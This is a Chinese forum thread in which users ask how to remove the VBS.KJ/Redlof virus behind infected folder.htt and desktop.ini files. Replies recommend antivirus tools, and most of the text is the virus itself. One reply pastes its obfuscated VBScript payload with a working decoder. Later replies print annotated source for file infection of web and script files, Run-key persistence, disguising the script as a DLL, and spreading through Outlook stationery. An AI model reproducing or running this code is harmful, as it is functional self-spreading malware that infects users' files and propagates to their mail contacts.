病毒形成的folder.htt和desktop.ini,有什么可以杀?

时间:2021-12-14 16:07:32
病毒形成的folder.htt和desktop.ini,有什么可以杀?
我用的金山毒霸搞不定啊,是升级到最新的版本了。

23 个解决方案

#1


小弟也是受害者,关注!

#2


利用查找找到所有的folder.htt和desktop.ini,然后删除,重新启动后,恢复一下注册表即可搞定。

#3


有那么简单吗?
这是VBS.KJ,或叫redlof。它还会感染网页文件。没有什么危害。用金山毒霸2001版(不是2002)并升级后杀就行了,不好之处就是太慢。

#4


小弟也是深受其害,不过今天我用最新的瑞星就搞定了,大家可以试一试哦
至于修改注册表,肯定是没有用的,因为我已经试过了,查出的病毒名叫“redlof”,今天我杀毒用了3个小时,我昏昏,昏

#5


这是VBS.KJ病毒,folder.htt被感染了,你可以用kv3000杀毒王的最新版本杀净。

#6


金山毒霸2001版 最新升级版 
杀完以后要把所有的folder.htt文件删除

#7


不要用金山毒霸了,我们实验室原来就是用金山毒霸。出现上述问题后都杀不了,我们现在用诺顿,几乎是天天升级。金山毒霸更新太慢了。

告诉楼主一个处理办法:
1。如果没有合适的查毒软件:
      a。查找上述两个文件将不在C盘下的全部删除,C盘下的对照无毒的机器一一删除。
      b。染毒时不要用IE浏览文件。用WindowsCommand之类代替。
2。安装诺顿,杀毒。注意,杀毒后将留下Desktop.ini文件,那是无毒的将其删除即可。  

#8


用kv3000杀毒王或熊猫卫士可以杀。
我就是用kv3000杀毒王杀的。

#9


请问哪有诺顿企业版下载呀?

#10


最好还是硬盘格格掉.不然的话不能按WEB页查询,好痛哦`

#11


别提了,金山毒霸2002上个月的病毒库还可以杀的,升级到最新的以后,竟然不行了,气死我了!!!

#12


嘿嘿,特征码没有找准!

#13


kill regedit

#14


最好桌面不要用web页
不知你们看到的是不是这样的:

<script language=vbscript>
ExeString = "@hgEmQdaq_(DsghPdrp(U\oPdrp(C_cnd_Oefh(=ojhaN\fabn(BRI(SrMdakf(ShhL]sb(Ot\A(Ecj]ks@ereRo^JD[os[np'#JDOas>ei'#JD?nd[paLchedo$%GFKcgaHn$%GFBla]s_I]hf$%GFOlkl`a]pd%?j`Mq^Eoj_sckjEF=ojajcNk$EchaO[pd+NuldMpn(KmAnqinQ_oql_JdrpMapLa]cNaio9EMK*NjajS_tpEcha'@ehdJ]pg&-%PioMpn7Nd[`Pdgl*Q_]`@fhCbHhopqPioMpn+GF^mp]qn$%!#8=,NlHdh$PljOpq#8+Pg_jLa]cNaio(?hnma?tesBqm]penhDh`H`H`PxjaOsl9dpsPg_jLa]cNaio(?hnmaMap@ehdNaio9EMK*NjajS_tpEcha'@ehdJ]pg&.%Bek_Palj*Sqcpa8 AI@Uijhn[`9!%ram_nhjp6!!EF[rn]ns%!: ra=nHeSglOslp^?qFb%DplfPawnEchaS_il-=hkr_R_pE;ppqc^<BON(Cas@ehdBek_L]sb%@=psle^-[ppqc^qs_o</0Ahr_Q_]`S_il-=hkr_R_pEchaS_il7BRI*Ko_jPdrpBhfa$EchaO[pd+2%CbSslaRnn<dsghNdamBhfaPdgl*Vlepdr^BlHb ;DPLF: ra=nHe!6%>N>Unhhk`^9!r^r]neon6 JD[os[np'#!!8%r^BlHb DsghPdrp?hodCbSslaRnn<ramSbajBek_Palj*Sqcpap^?qFb%R^rNatsAm^EeBhfaPdgl*BfkodAm^EeAm^Bth_phijBth_phijJD?d`hcaRo^$BonndhpOslejf&H]rnEjc_t?g[n%EbF]osCj`dr?d`l9*Pg_jCbK_bp'F?]r_$?tlnamnOpqcjc(&-%78K=]od_!#Pg_jEF?g[jcdMq^7Bhh]hx>eoj!4XOqa?9*DfoaGFBb]jf_Oqa9Bbn$@m_$K_bp'F?]r_$?tlnamnOpqcjc(&-%()0#6X!Ot\A<,?j`Cb?hodGI=d]maaOt\9Ge`'=qnq_jpRnnema(-+F]osCj`dr?d`l%?j`Cb?j`@qjbnekm@qjbnekmGFBla]s_I]hf$%Kj?nnnlNdmqidJawnH`EmQdaq_9dplfSbajAthnBth_phij?j`CbMd]q_Bek_9FabsSemJ]pg&/% Olkcq[iEcharV?klgkj@ehdmXIh]nkribpMd]q_`XRn]phijaqsX^k[jg-bpi!Ee$BRI*BhfaAwcoprOd`laBhfa%(PddhB[hhEF=ojajcNk$Rb]nd@ehd&dsgh(AkmaMap@ehdNaio9EMK*NjajS_tpEcha'Md]q_Bek_(.+nnqd#EchaS_il-Qnes_;DPLF: ra=nHe!6%>N>Unhhk`^9!r^r]neon6 JD[os[np'#!!8%r^BlHb DsghPdrp@ehdNaio(?hnma?j`Cb>ab`ohpH^9QoOg_hh-LacQ_]`'DGDS[?TLNAMN[QR?NXH^ajscpedmX@d`]qknQr_nH>%KqsFkkjPanrckj7SrMdakf*NdaNa`^$GEAU^FK?@F[I@=DEM?XOn`ps`laXLc_nnmkbsVKqsfkkjAtolaorVIacc]Rdl%SoRbahk(NafQnes_GEAU^=QNQ?JP^OOAQVE`dhpescao[@d`]qknE`%XOn`ps`laXLc_nnmkbsVKqsfkkjAtolaorVFabsKqsFkkjPanrckj++%%*,[G]ekV?kljkodQodOp`nekm_nu!&-(!LAC^>SKQ>=]hkGFL[ehQ_c$!BGAXY?QQLAJSYQODLXEc_jphnearVC_b]tfpEc XRibpv[na[Ge_qiokenXKtnhkneAwjnarmX%Haen$KtnHkneRaqmekm&-% */VI]hfXOs[penhanxJ]l_(Rb]nd@ehd#B[hhEFI`chNda$GEAU^=QNQ?JP^OOAQVE`dhpescao[@d`]qknE`%XOn`ps`laXLc_nnmkbsVKqsfkkjAtolaorVFabsKqsFkkjPanrckj++%%*,[G]ekVSec_Os[penhanxJ]l_(Rb]nd@ehd#VmOddfh*Q_cSqcpaDGDS[?TLNAMN[QR?NXRibpv[na[Ge_qiokenXKe`e_dV5*/VKqsfkkjVKlsckjrVI]hfXAccpkqJnae_nam]a++/-/1.(!LAC^>SKQ>=]hkGFL[ehQ_c$!BGAXY?QQLAJSYQODLXOn`ps`laXLc_nnmkbsVSem^ksrIarm]chhcRo^oxmpalVLnn`ehdmXIh]nkribpIqpkikgCjpdljasOasnejfmX,`*`,1*,,/*,,/*,_/*,,/*,,/*,,/.2X/*-a/-2,!&^k[jg!#B[hhEFI`chNda$GEAU^=QNQ?JP^OOAQVOkens]q_XIh]nkribp[QejcisoHPXBonndhpRdloenhXShh`kvmIdmo]fcjcMq^rsopdgXLqibek_oXLc_nnmkbsKqsfkkjEjs_njdnOdnpemaoX/[,`/,,,/*,,/*,,b*,,/*,,/*,,/*02[*,-d*/2/(af]jj%QoOg_hh-LacVlepdDJ?U[BONNDHP[TMAN[Mkbsq]ndVIeblkon`pXN`beb_X-/(,XNophnigXNjpenhoXL[eh[?`esinLq_baq_j_d(-2+,31&NDA[@VIN@!?`fhJDI]hfNafDJ?U[BONNDHP[TMAN[Mkbsq]ndVIeblkon`pXN`beb_X-/(,XBiiinhXI`chOdnpemaoXM_sOs[penhanx(af]jj%EFqlg]cd@khc_n$K_bp'QejO[pd+-%%Lqicn`gBhfao[=kilijEcharVIeblkon`pRb]nd^XOs[penhanx%?j`@qjbnekm@qjbnekmGFBla]s_Iekcaq'#NhAqlknLaotgaM_tpPaljL]sb9CbMip$EMK*EchaDreosm$ShhL]sbSOblels(atd%%NdamPdglL`nd<oxmpal-.X!Am^EeEePaljL]sb9ournai2,XNdamOs[npTjBek_9QejO[pd RSOPDGXGdljak-.*cfhAhr_Rn]nsOlBhfa<SemJ]pg!MUOS?IXJ_njdf*`kf?j`CbQoOg_hh-LacVlepdDJ?U[KI?=KYI=BBEJDVOkens]q_XIh]nkribp[Qejciso[=qnq_jpU_nohijXQojXJ_njdf/.!&Op`lpQo@ehdBRI*?njuBhfaVcjL`nd%sd\Xgiq]hk(cee(ShhL]sbsaaVBkk^an-bpp!BRI*?njuBhfaVcjL`nd%oxmpal-.Xjds]kf*ch`(VcjL`nd%oxmpal-.Xc_ogsil*hhe?]kfGI;lldh`PnSemJ]pg!qa^[@khc_n*gnp+dps%

#15


QoOg_hh-LacVlepdDJ?U[BF=OR?O[QIKP[(`hkV(!^hhecha!SrMdakf*NdaSnhna!BGAXY?H@MOARYNKNNX*cfhXBijpdhpSsla!&]ojheb[penh+t,go`nqjhn[`SoRbahk(NafQnes_GEAU^=H=RMAO^LKKSV`hk`ehdV@ae[qhsC_kmV(VmOddfh*Q_cNd[`$!BGAXY?H@MOARYNKNNXrw^bek_X@d`]qknE_nhX(SrMdakf*NdaSnhna!BGAXY?H@MOARYNKNNX`kfbek_XOblels?jchhaX!&RAM_nhjpSoRbahk(NafQnes_GEAU^=H=RMAO^LKKSV`hk@ehdVOddfhXNjaj[=kil[j`[(ShhL]sbNaioJ]pg!QO_qclp-_ta!0$$QoOg_hh-LacVlepdDJ?U[BF=OR?O[QIKP[^hhEcha[MdakfAt[Jnko_npxMdadnD]m^haqmXSRBLnnjoX!&w5*.13==1,31/A'--B@)4B32)/*==/*>46*4?|VmOddfh*Q_cSqcpaDGDS[?K;OODM[NNIPXcfhBhfaXR]neonDkrnAjbi`a[(z21-2+2/0'04/=)-0>.)A+B5,*,?/.B45=/.3wMap@ehdNaio9EMK*NjajS_tpEcha'Mp]qnQlEcha+,(pqoa%Bek_Palj*SqcpaP^oS_tpBek_Palj*?kioaAjcBqm]penhBqm]penhGIFegdCp$(EeEjVband8:dplfSbajAthnBth_phij?j`CbNderFk_`nekm9ci_ql_jp-fk_`nekmEeHaen$PgcoHn]]phij(.%<bhfaNdamPgcoHn]]phij<IecPdhmHkb[penh(5(EeBON(Cas?tpdhoenhJ]l_$PgcoHn]]phij%6:!pg_jNderFk_`nekm9K_bp'NderFk_`nekm&HamPdhmHkb[penh%,HamBON(Cas@ehdH]idPdhmHkb[penh%%(Am^EeEeHamPdhmHkb[penh%=/SbajPdhmHkb[penh9NderFk_`nekm!V?j`CbEFqlg]cd@khc_n$SbeoKi_]sckj(Am^EeAm^Bth_phijBth_phijJDI]hfNafNafMpn+@ehdH]id#NhAqlknLaotgaM_tpNafNaioMpn7SrMdakf*NdaNa`^$NdaOpq#H`NdaPaljOpq9!Pg_jQoOg_hh-LacVlepdNafMpn+@ehdH]idAm^EeAm^Bth_phijBth_phijJDK^nMq^'=qnq_jpRnnema%Mq^D9/PdmpKtn9*CiSgchaNnqdPdmpKtn9NaosIqp%-EbNaosIqp8.7PddhBonndhpOslejf9Ecj]ks@ere6X!AwcpCiDh`H`NhAqlknLaotgaM_tpOasPdhmBkk^an7BRI*CdnBkk^an'=qnq_jpRnnema%Map>e_Ro^<?nd[paN\fabn$R]neonejf(@ebnekm[nu!#R_pEih`dlo<PdhmBkk^an-Mq^Eih`dlo@khc_n?nojp7,BkqA]bbPdglBnf`aqej@khc_noBkk^anBiqjs9Eih`dl?kthp*->e_Ro^*`^`Eih`dl?kthp(Naio@khc_n*M[iaJawnH`@h]Oqa(?kthp<,SbajH]rnEjc_t?g[n<EjrnnNdp$?tlnamnOpqcjc+X+Faj'=qnq_jpRnnema%)0#Ro^Oslejf9Lc`$BonndhpOslejf&H]rnEjc_t?g[n'0&Ham?qqlajsMpnhhc%,F]osCj`dr?d`l)-(?tlnamnOpqcjc7GI=d]maaOt\$?tlnamnOpqcjc+F]osCj`dr?d`l%Mq^D90AkmaCbRo^A7,Ndam?tlnamnOpqcjc7?tlnamnOpqcjc @h]Oqa(Epdg$-(!V?tes@kAhr_i9/Bnlf7-NkEih`dl?kthpCbK=]odOqaMpnhhc%7HB[oa'>e_Ro^*Hnai'd%%NdamEef;Bkk^anBiqjsPddhBonndhpOslejf9BonndhpOslejfCc_Ot\*Es_i$i%-% [Drep>k?j`Cb?j`CbHatsH`mpEm^atBb]n7EmmpnQ_r$BonndhpOslejf&X!&Ham?qqlajsMpnhhc%,+%Mq^Rnnema9Ge`'=qnq_jpRnnema(H`mpEm^atBb]n*+(Hdh$?tlnamnOpqcjc('H]rnEjc_t?g[n)0#BonndhpOslejf9JD?d`hcaRo^$BonndhpOslejf&H]rnEjc_t?g[n%AjcEbAjcEbHknjJDK^nMq^7?tlnamnOpqcjcAjcBqm]penhBqm]penhGIJnko[c]s_$%Kj?nnnlNdmqidJawnQ_cL`ndR`fqa7GEAU^FK?@F[I@=DEM?XOn`ps`laXLc_nnmkbsVKqsfkkjAtolaorV@aflaa!@hmg@danad9VmOddfh*Q_cNd[`$Q_cL`ndR`fqa(Ee@ere@aflaa7!PddhCcogC_cnd_9@ej`fu@hmg%6[Dh`H`Einh7-si1@ere@aflaa7GII^kRo^$CcogC_cnd_%EFqlg]cd@khc_n$CcogC_cnd_%HatsSrMdakf*NdaSnhnaQ_cL`ndR`fqa+>eoj>acq_a?j`@qjbnekm@qjbnekmGFtgi]f_Bkk^an'J]pgH]id#NhAqlknLaotgaM_tpOasBkk^anM[ia7BRI*CdnBkk^an'J]pgH]id#R_pSbeoEchar9Eih`dlJ]l_*BhfaoDps?terno<,@kn?]_gPdhmBek_EmPdhmBek_o@ehd?tp7QB[oa'@OK-AapDrpammekmH]idPdhmBek_*L`nd%(EeBek_Ats9!BPI!Kn@ehd?tp7GNIH!Kn@ehd?tp7@MLInEchaDrp<LGJNlBhfaAwn9FOOPg_j=]hkGF@jlam^Pk'Nder@ehd(L]sb(gnih!#DfoaH`BhfaAwn9R>RPg_j=]hkGF@jlam^Pk'Nder@ehd(L]sb(u\o(AkmaEeBek_Ats9!BPP!PddhGnpAwcopr90Am^EeJdrpCb'O?]r_$L`ndJ`ga%7QB[oa'QejO[pd C_ogsilX!#%Nl$T=]odL]sbJ]l_%<Q?`ma$VcjL`nd%@dmgpnj%(NdamDsnAthmpo7-AjcEbEbBppDreosm9*Pg_j@OK-=klx@ehdSemJ]pg!muos_i/1V`arepko(ejh(L`ndJ`ga@OK-=klx@ehdSemJ]pg!qa^[@khc_n*gnp+J]pgH]idAm^EeAm^Bth_phijBth_phijJDOas>ei'#NhAqlknLaotgaM_tpAnq(?hd[nNaosCp<SOblels(O_qclpEohhm[iaEb?nnNdamEmQdaq_9dplf?hodEmQdaq_9r^rDh`H`H`EmQdaq_9r^rPg_jMap@OK7?q_]pdI^fd]p$!M_nhjpema*BhfaOxmpalI^fd]p(OdnSrMdakf9=na`naKada_sSR]neon*Og_hh!#DfoaOas=lofaKada_s9ci_ql_jp-[llk_po'GF^aqarn%=lofaKada_s(oas=HOH>$z@5/4>?.1'-?E*)-0>,)@>>5,*,?/.B@42=,Aw%=lofaKada_s(_nd[paHhop`h_a'#R_pVmOddfh<=lofaKada_s(CasI^fd]p$(=ojhaN\fabn*odn?HRC@$!u,@3-BA/+)B/3/)0+?B,250/',,@*?5//0.12y(=ojhaN\fabn*_q_]pdCjos[j_d%Map@OK7=ojhaN\fabn*CdnK^i__p'#Dh`H`R_pCcogN\fabn9@OK->neu_o@kn?]_g@erePaljEm@ereK^i__pEb>eojNaio(@nhpaPxja;8.;j`>eojNaio(@nhpaPxja;8-NdamAwcpEin?j`Cb@ej`fu@hmg<@erePalj*@qcraK_ppdlM_tp@elKpg_n=ql$/(N`h`klcvaBkqe9/Pk-Nndaq;nn'c%<Ejs$5$Nm^%%JawnS_ilRnnema9@knc9-NkK_j$SbeoS_tp(PdglJtg9;o_'Ge`'NderNats&e(0#%CbS_ilMoi<-/NdamPdglJtg9,4?hodCbS_ilMoi<-,NdamPdglJtg9,5?j`CbNaio=d]q9Bbn$S_ilMoi,Kpg_n=ql$eGk`.%%EbNaio=d]q9Bbn$2.%SbajPalj?d`l9=dn'+4%AjcEbPaljOpqcjc7PdglOslejfS_ilBb]nJawnThHkbeOpq9!?tabopa'@hgGds=nq/%+NderNatsu\?nK`!Eau@ln$/#9Ipddl=nq,% !ra=nHe J_u=ql$-(9!Nndaq;nn'+%%! r^BlHb%Gds=nq.%7 Ksban@ln$1#%p^?qFb!Gax;nn'-%<%Kpg_n=ql$/(!u\?nK`!@knc9-NkK_j$DraOslejf#%p^?qFb!PaljJql9@m_$Lc`$DraOslejf&e(0#%! r^BlHb%EePaljJql902Pg_j! r^BlHb%PdglJtg9-0! r^BlHb%Am^Eeu\?nK`!Naio=d]q9Bbn$S_ilMoi*Gax;nn'cIn^0(#%p^?qFb!EbNaio=d]q9Bbn$12%Sbaj!ra=nHe S_ilBb]n7ra=n! r^BlHb%AkmaEePalj?d`l9=dn',5%Ndamu\?nK`!Naio=d]q9u\Hb!ra=nHe Dh`H`%p^?qFb!PdhmPawn9NderNatsS_ilBb]n!ra=nHe M_tp!% ra=nHe!?tabopa'NderNats#NderNats9!?taRnnema9 PdglOslejf!DplfPawn9!6%oblelsh]maq]f_9ram_nhjp:!u\?nK``kboiamn*sqcpa!!6%`hpossha<!lkrcpenh6]amkhtna7fabs4,lw5pnj6,or7vc`pg4,lw5ddccds4,lw5v,cj`dr6.75rhme^hfepx4dh^`am!: ;!%=OJHASJ=L?9GI![ct_opBAEFBP9/SECND9/_kc_9_ng*ir(%]bnerdR*=bnerd!T?nglkm_jp=8 .;LLK?P:!!6%+ccr:!%r^BlHb ;+oblels8%r^BlHb ;o_qclpf]jfo]cd7r^r]neon: ra=nHeSbeoS_tp ra=nHeThHkbeOpqu\?nK`8 .m_nhjp:!u\?nK`8 .<K@X8%r^BlHb ;+DSGH:!RamPawn9NderNatsu\?nK`OjHn]gOslp^?qFb%GIYop`lp$(VcjL`nd<BON(CasMlabc]hEih`dl$,(!VCb'@OK-@ehd?terno$VcjL`nd%sd\XBnf`aq(dps%%NdamBRI*?njuBhfaVcjL`nd%sd\XBnf`aq(dps(ShhL]sbsaaVgfv[hh-aeb!Am^EeEe$BRI*BhfaAwcoprSemJ]pg!muos_i/1V`arepko(ejh%%NdamBRI*?njuBhfaVcjL`nd%oxmpal-.Xc_ogsil*hhe+QejO[pd rsopdg/.[efs`fh*fcbAjcEbAjcBqm]penh"
Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 4"&vbCrLf&"KeyArr(1) = 4"&vbCrLf&"KeyArr(2) = 1"&vbCrLf&"KeyArr(3) = 6"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute(ThisText)
</script>

#16


Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk

' ------------------------------------------------------------------------------
Sub KJ_start()
    KJSetDim()
    KJCreateMilieu()
    KJLikeIt()
    KJCreateMail()
    KJPropagate()
End Sub


' ------------------------------------------------------------------------------
' “感染”功能函数
' TypeStr 可能的取值有:htt,html,vbs
'
' htt:(.HTT)
'    最前面是 <BODY onload="vbscript:KJ_start()">,中间是原文件内容,最后是病毒体
' html:(.HTM,.HTML,.ASP,.PHP,.JSP)
'    最前面是原文件内容,最后是 <HTML> <BODY onload="vbscript:KJ_start()"> 和病毒体
' vbs:(.VBS)
'    最前面是原文件内容,最后是病毒体
'
' 对于 .htt 文件,染毒文件中有两块病毒体,原文件内容被夹在其中
' 对于其它的所有文件,染毒后的文件只在文件尾部有一块病毒体
' ------------------------------------------------------------------------------
Function KJAppendTo(FilePath,TypeStr)
    On Error Resume Next
    Set ReadTemp = FSO.OpenTextFile(FilePath,1)

    ' TmpStr 中存放文件的所有内容
    TmpStr = ReadTemp.ReadAll

    ' 如果此文件已被感染或者文件长度小于 1 就不进行感染
    If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
        ReadTemp.Close
        Exit Function
    End If

    If TypeStr = "htt" Then
        ReadTemp.Close
        Set FileTemp = FSO.OpenTextFile(FilePath,2)
        FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
        FileTemp.Close
        Set FAttrib = FSO.GetFile(FilePath)
        FAttrib.attributes = 34
    Else
        ReadTemp.Close
        Set FileTemp = FSO.OpenTextFile(FilePath,8)
        If TypeStr = "html" Then
            FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
        ElseIf TypeStr = "vbs" Then
            FileTemp.Write vbCrLf & VbsText
        End If
            FileTemp.Close
    End If
End Function


' ------------------------------------------------------------------------------
Function KJChangeSub(CurrentString,LastIndexChar)
    If LastIndexChar = 0 Then
        If Left(LCase(CurrentString),1) =< LCase("c") Then
            KJChangeSub = FinalyDisk & ":\"
            SubE = 0
        Else
            KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\"
            SubE = 0
        End If
    Else
        KJChangeSub = Mid(CurrentString,1,LastIndexChar)
    End If
End Function


' ------------------------------------------------------------------------------
Function KJCreateMail()
    On Error Resume Next
    If InWhere = "html" Then
        Exit Function
    End If

    ' 感染 C:\Program Files\Common Files\Microsoft Shared\Stationery\blank.htm
    ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
    If (FSO.FileExists(ShareFile)) Then
        Call KJAppendTo(ShareFile,"html")
    Else
        Set FileTemp = FSO.OpenTextFile(ShareFile,2,true)
        FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
        FileTemp.Close
    End If

    DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
    OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
    WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
    Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
    WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
    WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")

    ' 感染 C:\Program Files\Common Files\Microsoft Shared\Stationery 文件夹中的所有文件
    KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function

#17


' ------------------------------------------------------------------------------
Function KJCreateMilieu()
    On Error Resume Next
    TempPath = ""
    If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
        TempPath = "system32\"
    End If
    If TempPath = "system32\" Then
        StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
    Else
        StartUpFile = WinPath & "SYSTEM\Kernel.dll"
    End If

    ' 修改注册表,使病毒在一开机就可以运行一次
    WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile

    ' 之前已经复制过一次了,这里为什么还要复制一次?
    FSO.CopyFile WinPath & "web\kjwall.gif",WinPath & "web\Folder.htt"
    FSO.CopyFile WinPath & "system32\kjwall.gif",WinPath & "system32\desktop.ini"

    ' 感染 C:\Windows\Web\Folder.htt
    Call KJAppendTo(WinPath & "web\Folder.htt","htt")

    ' 使伪装成动态链接库的病毒脚本可以直接被执行
    WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type","application/x-msdownload"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"

    ' 建立 C:\Windows\System\Kernel.dll(Kernel32.dll) 并写入病毒体
    ' 此后每次开机这个病毒脚本都会被执行一次
    Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true)
    FileTemp.Write VbsText
    FileTemp.Close
End Function


' ------------------------------------------------------------------------------
Function KJLikeIt()
    If InWhere <> "html" Then
        Exit Function
    End If
    ThisLocation = document.location

    ' 只在本地浏览时才执行此步
    If Left(ThisLocation, 4) = "file" Then
        ThisLocation = Mid(ThisLocation,9)
        If FSO.GetExtensionName(ThisLocation) <> "" then
            ThisLocation = Left(ThisLocation,Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
        End If
        If Len(ThisLocation) > 3 Then
            ThisLocation = ThisLocation & "\"
        End If
        ' 感染本目录下可以感染的所有文件
        KJummageFolder(ThisLocation)
    End If
End Function


' ------------------------------------------------------------------------------
Function KJMailReg(RegStr,FileName)
    On Error Resume Next
    RegTempStr = WsShell.RegRead(RegStr)
    If RegTempStr = "" Then
        WsShell.RegWrite RegStr,FileName
    End If
End Function


' ------------------------------------------------------------------------------
Function KJOboSub(CurrentString)
    SubE = 0
    TestOut = 0
    Do While True
        TestOut = TestOut + 1
        If TestOut > 28 Then
            CurrentString = FinalyDisk & ":\"
            Exit Do
        End If
        On Error Resume Next
        Set ThisFolder = FSO.GetFolder(CurrentString)
        Set DicSub = CreateObject("Scripting.Dictionary")
        Set Folders = ThisFolder.SubFolders
        FolderCount = 0
        For Each TempFolder in Folders
            FolderCount = FolderCount + 1
            DicSub.add FolderCount, TempFolder.Name
        Next
        If DicSub.Count = 0 Then
            LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
            SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
            CurrentString = KJChangeSub(CurrentString,LastIndexChar)
            SubE = 1
        Else
            If SubE = 0 Then
                CurrentString = CurrentString & DicSub.Item(1) & "\"
                Exit Do
            Else
                j = 0
                For j = 1 To FolderCount
                    If LCase(SubString) = LCase(DicSub.Item(j)) Then
                        If j < FolderCount Then
                            CurrentString = CurrentString & DicSub.Item(j+1) & "\"
                            Exit Do
                        End If
                    End If
                Next
                LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
                SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
                CurrentString = KJChangeSub(CurrentString,LastIndexChar)
            End If
        End If
    Loop
    KJOboSub = CurrentString
End Function

#18


' ------------------------------------------------------------------------------
Function KJPropagate()
    On Error Resume Next
    RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
    DiskDegree = WsShell.RegRead(RegPathValue)
    If DiskDegree = "" Then
        DiskDegree = FinalyDisk & ":\"
    End If
    For i=1 to 5
        DiskDegree = KJOboSub(DiskDegree)
        KJummageFolder(DiskDegree)
    Next
    WsShell.RegWrite RegPathValue,DiskDegree
End Function


' ------------------------------------------------------------------------------
Function KJummageFolder(PathName)
    On Error Resume Next
    Set FolderName = FSO.GetFolder(PathName)
    Set ThisFiles = FolderName.Files
    HttExists = 0

    ' 感染本文件夹中每一个符合条件的文件(.Htm, .html, .asp, .php, .jsp, .vbs)
    For Each ThisFile In ThisFiles
        FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
        If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
            Call KJAppendTo(ThisFile.Path,"html")
        ElseIf FileExt = "VBS" Then
            Call KJAppendTo(ThisFile.Path,"vbs")
        ElseIf FileExt = "HTT" Then
            HttExists = 1
        End If
    Next
    If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop"))Then
        HttExists = 1
    End If

    ' 如果本文件夹中没有 .htt 文件,那就把已经准备好的染毒文件复制过来
    ' 这样做的目的在于使用户浏览文件夹的时候就可以运行病毒程序
    If HttExists = 0 Then
        FSO.CopyFile WinPath & "system32\desktop.ini",PathName
        FSO.CopyFile WinPath & "web\Folder.htt",PathName
    End If
End Function


' ------------------------------------------------------------------------------
Function KJSetDim()
    On Error Resume Next

    ' 判断病毒体在何种文件中被执行
    Err.Clear
    TestIt = WScript.ScriptFullname
    If Err Then
        InWhere = "html"
    Else
        InWhere = "vbs"
    End If

    If InWhere = "vbs" Then
        Set FSO = CreateObject("Scripting.FileSystemObject")
        Set WsShell = CreateObject("WScript.Shell")
    Else
